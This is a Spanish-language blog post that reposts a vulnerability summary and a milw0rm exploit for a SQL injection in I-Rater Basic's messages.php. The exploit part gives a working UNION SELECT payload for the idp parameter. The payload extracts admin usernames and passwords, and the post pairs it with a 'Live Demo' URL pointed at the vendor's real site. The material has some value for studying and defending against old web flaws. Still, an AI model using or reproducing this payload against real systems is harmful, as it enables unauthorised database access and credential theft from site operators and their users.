martes, 3 de febrero de 2009

I-Rater Basic(messages.php) SQL-injection.

Descripción: Una vulnerabilidad de inyección SQL en messages.php en I-Rater Basic permite a atacantes remotos ejecutar consultas SQL arbitrarias a través del parametro IDP.

Publicado antes de: 02/02/2009 - Última modificación: 03/02/2009
Gravedad: Alta

Tipo de Pérdida:
* Protección de seguridad
* Confidencialidad
* Integridad
* Disponibilidad
* Otra protección de seguridad

Enlaces:

* http://www.securityfocus.com/bid/32912
Fuente: BID Nombre: 32912

* http://www.milw0rm.com/exploits/7514
Fuente: MILW0RM Nombre: 7514

* http://secunia.com/advisories/33213
Fuente: SECUNIA Nombre: 33213 [Asesor]

Productos Afectados:

* I-Rater - i-rater_basic - _nil_

#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################

###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.


#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################





#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]

#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-18]

http://alerta-antivirus.inteco.es/seguridad/busca_vulns.php?vervuln=200806017
http://www.milw0rm.com/exploits/7514
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)